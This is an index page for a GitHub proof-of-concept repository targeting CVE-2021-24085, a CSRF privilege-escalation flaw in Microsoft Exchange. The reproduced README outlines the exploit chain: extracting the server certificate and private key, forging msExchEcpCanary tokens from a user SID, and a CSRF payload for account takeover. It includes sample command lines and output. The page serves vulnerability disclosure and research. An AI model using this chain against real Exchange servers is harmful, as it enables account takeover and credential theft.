Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/sourceincite/CVE-2021-24085
https://github.com/sourceincite/CVE-2021-24085
Last synced: 3 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/sourceincite/CVE-2021-24085
- Owner: sourceincite
- License: bsd-3-clause
- Created: 2021-02-15T14:41:25.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-02-15T15:11:00.000Z (over 3 years ago)
- Last Synced: 2024-05-08T01:30:56.814Z (6 months ago)
- Language: C#
- Size: 18.6 KB
- Stars: 70
- Watchers: 3
- Forks: 21
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - sourceincite/CVE-2021-24085 - (C# #)
README
# Microsoft Exchange Server msExchEcpCanary Cross Site Request Forgery Elevation of Privilege Vulnerability
This is a Proof of Concept for CVE-2021-24085.
1. `poc.py` downloads the targets cert file with private key inside
2. `YellowCanary` generates the `msExchEcpCanary` csrf token for a specific user based on the SID
3. `poc.js` is the csrf exploit to trigger an account takeover
I have not provided the `malicifest.xml` file but you can find information on how to generate a malcious manifest file from the available resources in the below references section.
## Example
Access the certificate with private key inside:
```
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###
researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax
```
Now you can generate csrf tokens with `YellowCanary` using a target users SID:
```
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax
#====================================================
# YellowCanary - generate msExchEcpCanary csrf tokens
#====================================================
security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.
```
## References:
- https://www.mdsec.co.uk/2019/01/abusing-office-web-add-ins-for-fun-and-limited-profit/
- https://info.phishlabs.com/blog/office-365-phishing-uses-malicious-app-persist-password-reset